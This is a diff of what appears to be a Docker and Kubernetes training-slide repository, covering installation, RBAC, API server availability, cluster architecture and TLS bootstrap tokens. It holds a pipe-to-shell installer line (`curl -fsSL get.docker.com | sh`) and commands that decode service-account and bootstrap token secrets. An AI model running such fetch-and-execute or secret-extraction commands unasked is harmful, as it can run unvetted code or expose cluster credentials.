* create container image with our dev environment
* run container with that image
* work on project
* when done, shutdown container
* next time we need to work on project, start a new container
* if we need to tweak the environment, we create a new image
* We have a clear definition of our environment, and can share it reliably with others.
* Let's see in the next chapters how to bake a custom image with `figlet`!
* We will see in the next chapters how to bake a custom image with `figlet`.

View File

@@ -70,9 +70,8 @@ class: pic
* An image is a read-only filesystem.
* A container is an encapsulated set of processes,
running in a read-write copy of that filesystem.
* A container is an encapsulated set of processes running in a
read-write copy of that filesystem.
* To optimize container boot time, *copy-on-write* is used
instead of regular copy.
@@ -178,11 +177,8 @@ Let's explain each of them.
## Root namespace
The root namespace is for official images.
They are gated by Docker Inc.
They are generally authored and maintained by third parties.
The root namespace is for official images. They are put there by Docker Inc.,
but they are generally authored and maintained by third parties.
Those images include:
@@ -192,7 +188,7 @@ Those images include:
* Ready-to-use components and services, like redis, postgresql...
* Over 150 at this point!
* Over 130 at this point!
---

View File

@@ -38,7 +38,11 @@ We can arbitrarily distinguish:
## Installing Docker on Linux
* The recommended method is to install the packages supplied by Docker Inc :
* The recommended method is to install the packages supplied by Docker Inc.:
https://store.docker.com
* The general method is:
- add Docker Inc.'s package repositories to your system configuration
@@ -52,12 +56,6 @@ We can arbitrarily distinguish:
https://docs.docker.com/engine/installation/linux/docker-ce/binaries/
* To quickly setup a dev environment, Docker provides a convenience install script:
```bash
curl -fsSL get.docker.com | sh
```
---
class: extra-details
@@ -84,11 +82,11 @@ class: extra-details
## Installing Docker on macOS and Windows
* On macOS, the recommended method is to use Docker Desktop for Mac:
* On macOS, the recommended method is to use Docker for Mac:
https://docs.docker.com/docker-for-mac/install/
* On Windows 10 Pro, Enterprise, and Education, you can use Docker Desktop for Windows:
* On Windows 10 Pro, Enterprise, and Education, you can use Docker for Windows:
https://docs.docker.com/docker-for-windows/install/
@@ -102,7 +100,7 @@ class: extra-details
---
## Docker Desktop for Mac and Docker Desktop for Windows
## Docker for Mac and Docker for Windows
* Special Docker Editions that integrate well with their respective host OS

View File

@@ -295,4 +295,4 @@ that you don't drop messages on the floor. Good luck.
If you want to learn more about the GELF driver,
have a look at [this blog post](
https://jpetazzo.github.io/2017/01/20/docker-logging-gelf/).
http://jpetazzo.github.io/2017/01/20/docker-logging-gelf/).

View File

@@ -6,6 +6,8 @@ In this chapter, we will:
* Present (from a high-level perspective) some orchestrators.
* Show one orchestrator (Kubernetes) in action.
---
class: pic
@@ -153,7 +155,7 @@ processes or data flows are given access to system resources.*
The scheduler is concerned mainly with:
- throughput (total amount of work done per time unit);
- throughput (total amount or work done per time unit);
- turnaround time (between submission and completion);
- response time (between submission and start);
- waiting time (between job readiness and execution);
@@ -247,7 +249,7 @@ class: pic
.center[![Not-so-good bin packing](images/binpacking-1d-1.gif)]
## We can't fit a job of size 6 :(
## Can we do better?
---
@@ -257,7 +259,7 @@ class: pic
.center[![Better bin packing](images/binpacking-1d-2.gif)]
## ... Now we can!
## Yup!
---
@@ -388,7 +390,7 @@ It depends on:
(Marathon = long running processes; Chronos = run at intervals; ...)
- Commercial offering through DC/OS by Mesosphere.
- Commercial offering through DC/OS my Mesosphere.
---

View File

@@ -19,7 +19,7 @@ class: title
- install Docker on e.g. a cloud VM
- use https://www.play-with-docker.com/ to instantly get a training environment
- use http://www.play-with-docker.com/ to instantly get a training environment
---

View File

@@ -119,7 +119,7 @@ Nano and LinuxKit VMs in Hyper-V!)
- golang, mongo, python, redis, hello-world ... and more being added
- you should still use `--platform` with multi-os images to be certain
- you should still use `--platform` with multi-os images to be certain
- Windows Containers now support `localhost` accessible containers (July 2018)
@@ -135,8 +135,8 @@ Most "official" Docker images don't run on Windows yet.
Places to Look:
- Hub Official: https://hub.docker.com/u/winamd64/
- Hub Official: https://hub.docker.com/u/winamd64/
- Microsoft: https://hub.docker.com/r/microsoft/
---
@@ -153,7 +153,7 @@ Places to Look:
- PowerShell [Tab Completion: DockerCompletion](https://github.com/matt9ucci/DockerCompletion)
- Best Shell GUI: [Cmder.net](https://cmder.net/)
- Best Shell GUI: [Cmder.net](http://cmder.net/)
- Good Windows Container Blogs and How-To's

View File

@@ -401,7 +401,7 @@ or providing extra features. For instance:
* [REX-Ray](https://rexray.io/) - create and manage volumes backed by an enterprise storage system (e.g.
SAN or NAS), or by cloud block stores (e.g. EBS, EFS).
* [Portworx](https://portworx.com/) - provides distributed block store for containers.
* [Portworx](http://portworx.com/) - provides distributed block store for containers.
* [Gluster](https://www.gluster.org/) - open source software-defined distributed storage that can scale
to several petabytes. It provides interfaces for object, block and file storage.

View File

@@ -1,16 +0,0 @@
version: "2"
services:
www:
image: nginx
volumes:
- .:/usr/share/nginx/html
ports:
- 80
builder:
build: .
volumes:
- ..:/repo
working_dir: /repo/slides
command: ./build.sh forever

(Binary image files and several large generated files were changed; their diffs are not shown.)

View File

@@ -10,24 +10,6 @@ TEMPLATE="""<html>
<div class="main">
<table>
<tr><td class="header" colspan="3">{{ title }}</td></tr>
<tr><td class="details" colspan="3">Note: while some workshops are delivered in French, slides are always in English.</td></tr>
<tr><td class="title" colspan="3">Free video of our latest workshop</td></tr>
<tr>
<td>Getting Started With Kubernetes and Container Orchestration</td>
<td><a class="slides" href="https://qconuk2019.container.training" /></td>
<td><a class="video" href="https://www.youtube.com/playlist?list=PLBAFXs0YjviJwCoxSUkUPhsSxDJzpZbJd" /></td>
</tr>
<tr>
<td class="details">This is a live recording of a 1-day workshop that took place at QCON London in March 2019.</td>
</tr>
<tr>
<td class="details">If you're interested, we can deliver that workshop (or longer courses) to your team or organization.</td>
</tr>
<tr>
<td class="details">Contact <a href="mailto:jerome.petazzoni@gmail.com">Jérôme Petazzoni</a> to make that happen!</td>
</tr>
{% if coming_soon %}
<tr><td class="title" colspan="3">Coming soon near you</td></tr>
@@ -36,10 +18,7 @@ TEMPLATE="""<html>
<tr>
<td>{{ item.title }}</td>
<td>{% if item.slides %}<a class="slides" href="{{ item.slides }}" />{% endif %}</td>
<td>{% if item.attend %}<a class="attend" href="{{ item.attend }}" />
{% else %}
<p class="details">{{ item.status }}</p>
{% endif %}</td>
<td><a class="attend" href="{{ item.attend }}" /></td>
</tr>
<tr>
<td class="details">Scheduled {{ item.prettydate }} at {{ item.event }} in {{item.city }}.</td>
@@ -53,10 +32,7 @@ TEMPLATE="""<html>
{% for item in past_workshops[:5] %}
<tr>
<td>{{ item.title }}</td>
<td>{% if item.slides %}<a class="slides" href="{{ item.slides }}" />
{% else %}
<p class="details">{{ item.status }}</p>
{% endif %}</td>
<td><a class="slides" href="{{ item.slides }}" /></td>
<td>{% if item.video %}<a class="video" href="{{ item.video }}" />{% endif %}</td>
</tr>
<tr>

View File

@@ -1,47 +1,3 @@
- date: 2019-11-13
country: fr
city: Marseille
event: DevopsDDay
speaker: jpetazzo
title: Déployer ses applications avec Kubernetes (in French)
lang: fr
attend: http://2019.devops-dday.com/Workshop.html
- date: [2019-09-24, 2019-09-25]
country: fr
city: Paris
event: ENIX SAS
speaker: jpetazzo
title: Déployer ses applications avec Kubernetes (in French)
lang: fr
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
- date: 2019-06-17
country: ca
city: Montréal
event: Zenika
speaker: jpetazzo
title: Getting Started With Kubernetes
attend: https://www.eventbrite.com/e/getting-started-with-kubernetes-1-day-en-tickets-61658444066
- date: [2019-06-10, 2019-06-11]
city: San Jose, CA
country: us
event: Velocity
title: Kubernetes for administrators and operators
speaker: jpetazzo
attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
- date: 2019-05-01
country: us
city: Cleveland, OH
event: PyCon
speaker: jpetazzo, s0ulshake
title: Getting started with Kubernetes and container orchestration
attend: https://us.pycon.org/2019/schedule/presentation/74/
slides: https://pycon2019.container.training/
video: https://www.youtube.com/watch?v=J08MrW2NC1Y
- date: 2019-04-28
country: us
city: Chicago, IL
@@ -49,46 +5,14 @@
speaker: jpetazzo
title: Getting Started With Kubernetes and Container Orchestration
attend: https://gotochgo.com/2019/workshops/148
slides: https://gotochgo2019.container.training/
- date: 2019-04-26
country: fr
city: Paris
event: ENIX SAS
speaker: jpetazzo
title: Opérer et administrer Kubernetes
attend: https://enix.io/fr/services/formation/operer-et-administrer-kubernetes/
slides: https://kadm-2019-04.container.training/
- date: [2019-04-23, 2019-04-24]
country: fr
city: Paris
event: ENIX SAS
speaker: jpetazzo
title: Déployer ses applications avec Kubernetes (in French)
lang: fr
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
slides: https://kube-2019-04.container.training/
- date: [2019-04-15, 2019-04-16]
country: fr
city: Paris
event: ENIX SAS
speaker: "jpetazzo, alexbuisine"
title: Bien démarrer avec les conteneurs (in French)
lang: fr
attend: https://enix.io/fr/services/formation/bien-demarrer-avec-les-conteneurs/
slides: http://intro-2019-04.container.training/
- date: 2019-03-08
- date: 2019-03-07
country: uk
city: London
event: QCON
speaker: jpetazzo
title: Getting Started With Kubernetes and Container Orchestration
attend: https://qconlondon.com/london2019/workshop/getting-started-kubernetes-and-container-orchestration
slides: https://qconuk2019.container.training/
video: https://www.youtube.com/playlist?list=PLBAFXs0YjviJwCoxSUkUPhsSxDJzpZbJd
- date: [2019-01-07, 2019-01-08]
country: fr
@@ -98,17 +22,15 @@
title: Bien démarrer avec les conteneurs (in French)
lang: fr
attend: https://enix.io/fr/services/formation/bien-demarrer-avec-les-conteneurs/
slides: https://intro-2019-01.container.training
- date: [2018-12-17, 2018-12-18]
country: fr
city: Paris
event: ENIX SAS
speaker: "jpetazzo, rdegez"
title: Déployer ses applications avec Kubernetes
title: Déployer ses applications avec Kubernetes (in French)
lang: fr
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
slides: http://decembre2018.container.training
- date: 2018-11-08
city: San Francisco, CA
@@ -193,7 +115,7 @@
city: Paris
event: ENIX SAS
speaker: jpetazzo
title: Déployer ses applications avec Kubernetes
title: Déployer ses applications avec Kubernetes (in French)
lang: fr
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
slides: https://septembre2018.container.training

View File

@@ -19,7 +19,7 @@ chapters:
- shared/about-slides.md
- shared/toc.md
- - containers/Docker_Overview.md
#- containers/Docker_History.md
- containers/Docker_History.md
- containers/Training_Environment.md
- containers/Installing_Docker.md
- containers/First_Containers.md
@@ -29,16 +29,13 @@ chapters:
- containers/Building_Images_Interactively.md
- containers/Building_Images_With_Dockerfiles.md
- containers/Cmd_And_Entrypoint.md
- - containers/Copying_Files_During_Build.md
- containers/Exercise_Dockerfile_Basic.md
- containers/Multi_Stage_Builds.md
- containers/Copying_Files_During_Build.md
- - containers/Multi_Stage_Builds.md
- containers/Publishing_To_Docker_Hub.md
- containers/Dockerfile_Tips.md
- containers/Exercise_Dockerfile_Advanced.md
- - containers/Naming_And_Inspecting.md
- containers/Labels.md
- containers/Getting_Inside.md
- containers/Resource_Limits.md
- - containers/Container_Networking_Basics.md
- containers/Network_Drivers.md
- containers/Container_Network_Model.md
@@ -48,16 +45,16 @@ chapters:
- containers/Windows_Containers.md
- containers/Working_With_Volumes.md
- containers/Compose_For_Dev_Stacks.md
- containers/Exercise_Composefile.md
- - containers/Docker_Machine.md
- containers/Advanced_Dockerfiles.md
- containers/Docker_Machine.md
- - containers/Advanced_Dockerfiles.md
- containers/Application_Configuration.md
- containers/Logging.md
- containers/Resource_Limits.md
- - containers/Namespaces_Cgroups.md
- containers/Copy_On_Write.md
#- containers/Containers_From_Scratch.md
- - containers/Container_Engines.md
#- containers/Ecosystem.md
- containers/Ecosystem.md
- containers/Orchestration_Overview.md
- shared/thankyou.md
- containers/links.md

View File

@@ -30,11 +30,9 @@ chapters:
- containers/Building_Images_With_Dockerfiles.md
- containers/Cmd_And_Entrypoint.md
- containers/Copying_Files_During_Build.md
- containers/Exercise_Dockerfile_Basic.md
- - containers/Multi_Stage_Builds.md
- containers/Publishing_To_Docker_Hub.md
- containers/Dockerfile_Tips.md
- containers/Exercise_Dockerfile_Advanced.md
- - containers/Naming_And_Inspecting.md
- containers/Labels.md
- containers/Getting_Inside.md
@@ -47,7 +45,6 @@ chapters:
- containers/Windows_Containers.md
- containers/Working_With_Volumes.md
- containers/Compose_For_Dev_Stacks.md
- containers/Exercise_Composefile.md
- containers/Docker_Machine.md
- - containers/Advanced_Dockerfiles.md
- containers/Application_Configuration.md

View File

@@ -1,89 +0,0 @@
# API server availability
- When we set up a node, we need the address of the API server:
- for kubelet
- for kube-proxy
- sometimes for the pod network system (like kube-router)
- How do we ensure the availability of that endpoint?
(what if the node running the API server goes down?)
---
## Option 1: external load balancer
- Set up an external load balancer
- Point kubelet (and other components) to that load balancer
- Put the node(s) running the API server behind that load balancer
- Update the load balancer if/when an API server node needs to be replaced
- On cloud infrastructures, some mechanisms provide automation for this
(e.g. on AWS, an Elastic Load Balancer + Auto Scaling Group)
- [Example in Kubernetes The Hard Way](https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/master/docs/08-bootstrapping-kubernetes-controllers.md#the-kubernetes-frontend-load-balancer)
---
## Option 2: local load balancer
- Set up a load balancer (like NGINX, HAProxy...) on *each* node
- Configure that load balancer to send traffic to the API server node(s)
- Point kubelet (and other components) to `localhost`
- Update the load balancer configuration when API server nodes are updated
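For example, a minimal HAProxy configuration for that local load balancer could look like this (a sketch; the addresses and port are placeholders):
```bash
cat > /etc/haproxy/haproxy.cfg <<EOF
defaults
  mode tcp
  timeout connect 5s
  timeout client 300s
  timeout server 300s
frontend kubernetes-api
  bind 127.0.0.1:6443
  default_backend apiservers
backend apiservers
  server master1 10.0.0.11:6443 check
  server master2 10.0.0.12:6443 check
  server master3 10.0.0.13:6443 check
EOF
```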
---
## Updating the local load balancer config
- Distribute the updated configuration (push)
- Or regularly check for updates (pull)
- The latter requires an external, highly available store
(it could be an object store, an HTTP server, or even DNS...)
- Updates can be facilitated by a DaemonSet
(but remember that it can't be used when installing a new node!)
---
## Option 3: DNS records
- Put all the API server nodes behind a round-robin DNS
- Point kubelet (and other components) to that name
- Update the records when needed
- Note: this option is not officially supported
(but since kubelet supports reconnection anyway, it *should* work)
---
## Option 4: ....................
- Many managed clusters expose a high-availability API endpoint
(and you don't have to worry about it)
- You can also use HA mechanisms that you're familiar with
(e.g. virtual IPs)
- Tunnels are also fine
(e.g. [k3s](https://k3s.io/) uses a tunnel to allow each node to contact the API server)

View File

@@ -1,383 +0,0 @@
# Kubernetes architecture
We can arbitrarily split Kubernetes in two parts:
- the *nodes*, a set of machines that run our containerized workloads;
- the *control plane*, a set of processes implementing the Kubernetes APIs.
Kubernetes also relies on underlying infrastructure:
- servers, network connectivity (obviously!),
- optional components like storage systems, load balancers ...
---
## Control plane location
The control plane can run:
- in containers, on the same nodes that run other application workloads
(example: Minikube; 1 node runs everything)
- on a dedicated node
(example: a cluster installed with kubeadm)
- on a dedicated set of nodes
(example: Kubernetes The Hard Way; kops)
- outside of the cluster
(example: most managed clusters like AKS, EKS, GKE)
---
class: pic
![Kubernetes architecture diagram: control plane and nodes](images/k8s-arch2.png)
---
## What runs on a node
- Our containerized workloads
- A container engine like Docker, CRI-O, containerd...
(in theory, the choice doesn't matter, as the engine is abstracted by Kubernetes)
- kubelet: an agent connecting the node to the cluster
(it connects to the API server, registers the node, receives instructions)
- kube-proxy: a component used for internal cluster communication
(note that this is *not* an overlay network or a CNI plugin!)
---
## What's in the control plane
- Everything is stored in etcd
(it's the only stateful component)
- Everyone communicates exclusively through the API server:
- we (users) interact with the cluster through the API server
- the nodes register and get their instructions through the API server
- the other control plane components also register with the API server
- API server is the only component that reads/writes from/to etcd
---
## Communication protocols: API server
- The API server exposes a REST API
(except for some calls, e.g. to attach interactively to a container)
- Almost all requests and responses are JSON following a strict format
- For performance, the requests and responses can also be done over protobuf
(see this [design proposal](https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md) for details)
- In practice, protobuf is used for all internal communication
(between control plane components, and with kubelet)
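One easy way to look at those JSON payloads (assuming `kubectl` is configured for the cluster):
```bash
kubectl proxy --port=8001 &          # authenticated local proxy to the API server
curl -s http://localhost:8001/api/v1/namespaces/default | head
kill %1                              # stop the proxy
```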
---
## Communication protocols: on the nodes
The kubelet agent uses a number of special-purpose protocols and interfaces, including:
- CRI (Container Runtime Interface)
- used for communication with the container engine
- abstracts the differences between container engines
- based on gRPC+protobuf
- [CNI (Container Network Interface)](https://github.com/containernetworking/cni/blob/master/SPEC.md)
- used for communication with network plugins
- network plugins are implemented as executable programs invoked by kubelet
- network plugins provide IPAM
- network plugins set up network interfaces in pods
---
class: pic
![Kubernetes architecture diagram: communication between components](images/k8s-arch4-thanks-luxas.png)
---
# The Kubernetes API
[
*The Kubernetes API server is a "dumb server" which offers storage, versioning, validation, update, and watch semantics on API resources.*
](
https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md#proposal-and-motivation
)
([Clayton Coleman](https://twitter.com/smarterclayton), Kubernetes Architect and Maintainer)
What does that mean?
---
## The Kubernetes API is declarative
- We cannot tell the API, "run a pod"
- We can tell the API, "here is the definition for pod X"
- The API server will store that definition (in etcd)
- *Controllers* will then wake up and create a pod matching the definition
---
## The core features of the Kubernetes API
- We can create, read, update, and delete objects
- We can also *watch* objects
(be notified when an object changes, or when an object of a given type is created)
- Objects are strongly typed
- Types are *validated* and *versioned*
- Storage and watch operations are provided by etcd
(note: the [k3s](https://k3s.io/) project allows us to use sqlite instead of etcd)
---
## Let's experiment a bit!
- For the exercises in this section, connect to the first node of the `test` cluster
.exercise[
- SSH to the first node of the test cluster
- Check that the cluster is operational:
```bash
kubectl get nodes
```
- All nodes should be `Ready`
]
---
## Create
- Let's create a simple object
.exercise[
- Create a namespace with the following command:
```bash
kubectl create -f- <<EOF
apiVersion: v1
kind: Namespace
metadata:
name: hello
EOF
```
]
This is equivalent to `kubectl create namespace hello`.
---
## Read
- Let's retrieve the object we just created
.exercise[
- Read back our object:
```bash
kubectl get namespace hello -o yaml
```
]
We see a lot of data that wasn't here when we created the object.
Some data was automatically added to the object (like `spec.finalizers`).
Some data is dynamic (typically, the content of `status`.)
---
## API requests and responses
- Almost every Kubernetes API payload (requests and responses) has the same format:
```yaml
apiVersion: xxx
kind: yyy
metadata:
name: zzz
(more metadata fields here)
(more fields here)
```
- The fields shown above are mandatory, except for some special cases
(e.g.: in lists of resources, the list itself doesn't have a `metadata.name`)
- We show YAML for convenience, but the API uses JSON
(with optional protobuf encoding)
---
class: extra-details
## API versions
- The `apiVersion` field corresponds to an *API group*
- It can be either `v1` (aka "core" group or "legacy group"), or `group/versions`; e.g.:
- `apps/v1`
- `rbac.authorization.k8s.io/v1`
- `extensions/v1beta1`
- It does not indicate which version of Kubernetes we're talking about
- It *indirectly* indicates the version of the `kind`
(which fields exist, their format, which ones are mandatory...)
- A single resource type (`kind`) is rarely versioned alone
(e.g.: the `batch` API group contains `jobs` and `cronjobs`)
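To explore groups and versions on a live cluster:
```bash
kubectl api-versions                               # all group/version pairs served
kubectl api-resources --api-group=apps             # resource kinds in the "apps" group
kubectl explain deployment --api-version=apps/v1   # schema of a kind in a given version
```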
---
## Update
- Let's update our namespace object
- There are many ways to do that, including:
- `kubectl apply` (and provide an updated YAML file)
- `kubectl edit`
- `kubectl patch`
- many helpers, like `kubectl label`, or `kubectl set`
- In each case, `kubectl` will:
- get the current definition of the object
- compute changes
- submit the changes (with `PATCH` requests)
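For instance, the same kind of change can be expressed directly as a patch (here, a strategic merge patch on the namespace we created earlier):
```bash
kubectl patch namespace hello --patch '{"metadata": {"labels": {"team": "blue"}}}'
```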
---
## Adding a label
- For demonstration purposes, let's add a label to the namespace
- The easiest way is to use `kubectl label`
.exercise[
- In one terminal, watch namespaces:
```bash
kubectl get namespaces --show-labels -w
```
- In the other, update our namespace:
```bash
kubectl label namespaces hello color=purple
```
]
We demonstrated *update* and *watch* semantics.
---
## What's special about *watch*?
- The API server itself doesn't do anything: it's just a fancy object store
- All the actual logic in Kubernetes is implemented with *controllers*
- A *controller* watches a set of resources, and takes action when they change
- Examples:
- when a Pod object is created, it gets scheduled and started
- when a Pod belonging to a ReplicaSet terminates, it gets replaced
- when a Deployment object is updated, it can trigger a rolling update
---
# Other control plane components
- API server ✔️
- etcd ✔️
- Controller manager
- Scheduler
---
## Controller manager
- This is a collection of loops watching all kinds of objects
- That's where the actual logic of Kubernetes lives
- When we create a Deployment (e.g. with `kubectl run web --image=nginx`),
- we create a Deployment object
- the Deployment controller notices it, creates a ReplicaSet
- the ReplicaSet controller notices it, creates a Pod
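We can observe that chain of objects on a live cluster (assuming there is no pre-existing `web` Deployment):
```bash
kubectl create deployment web --image=nginx
kubectl get deployments,replicasets,pods -l app=web   # one object of each kind
kubectl delete deployment web                         # clean up
```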
---
## Scheduler
- When a pod is created, it is in `Pending` state
- The scheduler (or rather: *a scheduler*) must bind it to a node
- Kubernetes comes with an efficient scheduler with many features
- if we have special requirements, we can add another scheduler
<br/>
(example: this [demo scheduler](https://github.com/kelseyhightower/scheduler) uses the cost of nodes, stored in node annotations)
- A pod might stay in `Pending` state for a long time:
- if the cluster is full
- if the pod has special constraints that can't be met
- if the scheduler is not running (!)
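When a pod stays in `Pending`, the events usually tell us why (`<podname>` is a placeholder):
```bash
kubectl describe pod <podname> | grep -A5 Events:
# Or, cluster-wide:
kubectl get events --field-selector reason=FailedScheduling
```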

View File

@@ -64,7 +64,7 @@
(`401 Unauthorized` HTTP code)
- If a request is neither rejected nor accepted by anyone, it's anonymous
- If a request is neither accepted nor accepted by anyone, it's anonymous
- the user name is `system:anonymous`
@@ -108,7 +108,7 @@ class: extra-details
--raw \
-o json \
| jq -r .users[0].user[\"client-certificate-data\"] \
| openssl base64 -d -A \
| base64 -d \
| openssl x509 -text \
| grep Subject:
```
@@ -127,7 +127,7 @@ class: extra-details
- `--raw` includes certificate information (which shows as REDACTED otherwise)
- `-o json` outputs the information in JSON format
- `| jq ...` extracts the field with the user certificate (in base64)
- `| openssl base64 -d -A` decodes the base64 format (now we have a PEM file)
- `| base64 -d` decodes the base64 format (now we have a PEM file)
- `| openssl x509 -text` parses the certificate and outputs it as plain text
- `| grep Subject:` shows us the line that interests us
@@ -143,21 +143,19 @@ class: extra-details
(see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))
- As a result, we don't have an easy way to terminate someone's access
- As a result, we cannot easily suspend a user's access
(if their key is compromised, or they leave the organization)
- There are workarounds, but they are very inconvenient:
- Option 1: re-create a new CA and re-issue everyone's certificates
<br/>
→ Maybe OK if we only have a few users; no way otherwise
- issue short-lived certificates (e.g. 24 hours) and regenerate them often
- Option 2: don't use groups; grant permissions to individual users
<br/>
→ Inconvenient if we have many users and teams; error-prone
- re-create the CA and re-issue all certificates in case of compromise
- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
<br/>
→ This can be facilitated by e.g. Vault or by the Kubernetes CSR API
- grant permissions to individual users, not groups
<br/>
(and remove all permissions to a compromised user)
- Until this is fixed, we probably want to use other methods
---
@@ -262,7 +260,7 @@ class: extra-details
- Extract the token and decode it:
```bash
TOKEN=$(kubectl get secret $SECRET -o json \
| jq -r .data.token | openssl base64 -d -A)
| jq -r .data.token | base64 -d)
```
]
@@ -409,7 +407,7 @@ class: extra-details
- We are going to create a service account
- We will use a default cluster role (`view`)
- We will use an existing cluster role (`view`)
- We will bind together this role and this service account
@@ -576,51 +574,6 @@ It's important to note a couple of details in these flags ...
class: extra-details
## Where does this `view` role come from?
- Kubernetes defines a number of ClusterRoles intended to be bound to users
- `cluster-admin` can do *everything* (think `root` on UNIX)
- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
- `edit` is similar to `admin`, but cannot view or edit permissions
- `view` has read-only access to most resources, except permissions and secrets
*In many situations, these roles will be all you need.*
*You can also customize them if needed!*
---
class: extra-details
## Customizing the default roles
- If you need to *add* permissions to these default roles (or others),
<br/>
you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
- This happens by creating a ClusterRole with the following labels:
```yaml
metadata:
labels:
rbac.authorization.k8s.io/aggregate-to-admin: "true"
rbac.authorization.k8s.io/aggregate-to-edit: "true"
rbac.authorization.k8s.io/aggregate-to-view: "true"
```
- This ClusterRole's permissions will be added to `admin`/`edit`/`view` respectively
- This is particularly useful when using CustomResourceDefinitions
(since Kubernetes cannot guess which resources are sensitive and which ones aren't)
---
class: extra-details
## Where do our permissions come from?
- When interacting with the Kubernetes API, we are using a client certificate
@@ -658,26 +611,3 @@ class: extra-details
```bash
kubectl describe clusterrole cluster-admin
```
---
class: extra-details
## Figuring out who can do what
- For auditing purposes, sometimes we want to know who can perform an action
- Here is a proof-of-concept tool by Aqua Security, doing exactly that:
https://github.com/aquasecurity/kubectl-who-can
- This is one way to install it:
```bash
docker run --rm -v /usr/local/bin:/go/bin golang \
go get -v github.com/aquasecurity/kubectl-who-can
```
- This is one way to use it:
```bash
kubectl-who-can create pods
```

View File

@@ -1,259 +0,0 @@
# TLS bootstrap
- kubelet needs TLS keys and certificates to communicate with the control plane
- How do we generate this information?
- How do we make it available to kubelet?
---
## Option 1: push
- When we want to provision a node:
- generate its keys, certificate, and sign centrally
- push the files to the node
- OK for "traditional", on-premises deployments
- Not OK for cloud deployments with auto-scaling
---
## Option 2: poll + push
- Discover nodes when they are created
(e.g. with cloud API)
- When we detect a new node, push TLS material to the node
(like in option 1)
- It works, but:
- discovery code is specific to each provider
- relies heavily on the cloud provider API
- doesn't work on-premises
- doesn't scale
---
## Option 3: bootstrap tokens + CSR API
- Since Kubernetes 1.4, the Kubernetes API supports CSR
(Certificate Signing Requests)
- This is similar to the protocol used to obtain e.g. HTTPS certificates:
- subject (here, kubelet) generates TLS keys and CSR
- subject submits CSR to CA
- CA validates (or not) the CSR
- CA sends back signed certificate to subject
- This is combined with *bootstrap tokens*
---
## Bootstrap tokens
- A [bootstrap token](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/) is an API access token
- it is a Secret with type `bootstrap.kubernetes.io/token`
- it is 6 public characters (ID) + 16 secret characters
<br/>(example: `whd3pq.d1ushuf6ccisjacu`)
- it gives access to groups `system:bootstrap:<ID>` and `system:bootstrappers`
- additional groups can be specified in the Secret
---
## Bootstrap tokens with kubeadm
- kubeadm automatically creates a bootstrap token
(it is shown at the end of `kubeadm init`)
- That token adds the group `system:bootstrappers:kubeadm:default-node-token`
- kubeadm also creates a ClusterRoleBinding `kubeadm:kubelet-bootstrap`
<br/>binding `...:default-node-token` to ClusterRole `system:node-bootstrapper`
- That ClusterRole gives create/get/list/watch permissions on the CSR API
---
## Bootstrap tokens in practice
- Let's list our bootstrap tokens on a cluster created with kubeadm
.exercise[
- Log into node `test1`
- View bootstrap tokens:
```bash
sudo kubeadm token list
```
]
- Tokens are short-lived
- We can create new tokens with `kubeadm` if necessary
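For example, on a control plane node (these are standard `kubeadm` flags):
```bash
# Create a token valid for one hour, and print the matching "kubeadm join" command
sudo kubeadm token create --ttl 1h --print-join-command
```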
---
class: extra-details
## Retrieving bootstrap tokens with kubectl
- Bootstrap tokens are Secrets with type `bootstrap.kubernetes.io/token`
- Token ID and secret are in data fields `token-id` and `token-secret`
- In Secrets, data fields are encoded with Base64
- This "very simple" command will show us the tokens:
```
kubectl -n kube-system get secrets -o json |
jq -r '.items[]
| select(.type=="bootstrap.kubernetes.io/token")
| ( .data["token-id"] + "Lg==" + .data["token-secret"] + "Cg==")
' | base64 -d
```
(On recent versions of `jq`, you can simplify by using filter `@base64d`.)
---
class: extra-details
## Using a bootstrap token
- The token we need to use has the form `abcdef.1234567890abcdef`
.exercise[
- Check that it is accepted by the API server:
```bash
curl -k -H "Authorization: Bearer abcdef.1234567890abcdef"
```
- We should see that we are *authenticated* but not *authorized*:
```
User \"system:bootstrap:abcdef\" cannot get path \"/\""
```
- Check that we can access the CSR API:
```bash
curl -k -H "Authorization: Bearer abcdef.1234567890abcdef" \
https://10.96.0.1/apis/certificates.k8s.io/v1beta1/certificatesigningrequests
```
]
---
## The cluster-info ConfigMap
- Before we can talk to the API, we need:
- the API server address (obviously!)
- the cluster CA certificate
- That information is stored in a public ConfigMap
.exercise[
- Retrieve that ConfigMap:
```bash
curl -k https://10.96.0.1/api/v1/namespaces/kube-public/configmaps/cluster-info
```
]
*Extracting the kubeconfig file is left as an exercise for the reader.*
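(If you're curious, here is one possible solution, assuming `jq` is available on the node:)
```bash
curl -sk https://10.96.0.1/api/v1/namespaces/kube-public/configmaps/cluster-info \
  | jq -r '.data.kubeconfig'
```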
---
class: extra-details
## Signature of the config-map
- You might have noticed a few `jws-kubeconfig-...` fields
- These are config-map signatures
(so that the client can protect against MITM attacks)
- These are JWS signatures using HMAC-SHA256
(see [here](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/#configmap-signing) for more details)
---
## Putting it all together
This is the TLS bootstrap mechanism, step by step.
- The node uses the cluster-info ConfigMap to get the cluster CA certificate
- The node generates its keys and CSR
- Using the bootstrap token, the node creates a CertificateSigningRequest object
- The node watches the CSR object
- The CSR object is accepted (automatically or by an admin)
- The node gets notified, and retrieves the certificate
- The node can now join the cluster
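When auto-approval is disabled, the manual approval step looks like this (`<csr-name>` is a placeholder):
```bash
kubectl get csr                         # list pending CertificateSigningRequests
kubectl certificate approve <csr-name>  # approve one of them
```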
---
## Bottom line
- If you paid attention, we still need a way to:
- either safely get the bootstrap token to the nodes
- or disable auto-approval and manually approve the nodes when they join
- The goal of the TLS bootstrap mechanism is *not* to solve this
(in terms of information knowledge, it's fundamentally impossible!)
- But it reduces the differences between environments, infrastructures, providers ...
- It gives a mechanism that is easier to use, and flexible enough, for most scenarios
---
## More information
- As always, the Kubernetes documentation has extra details:
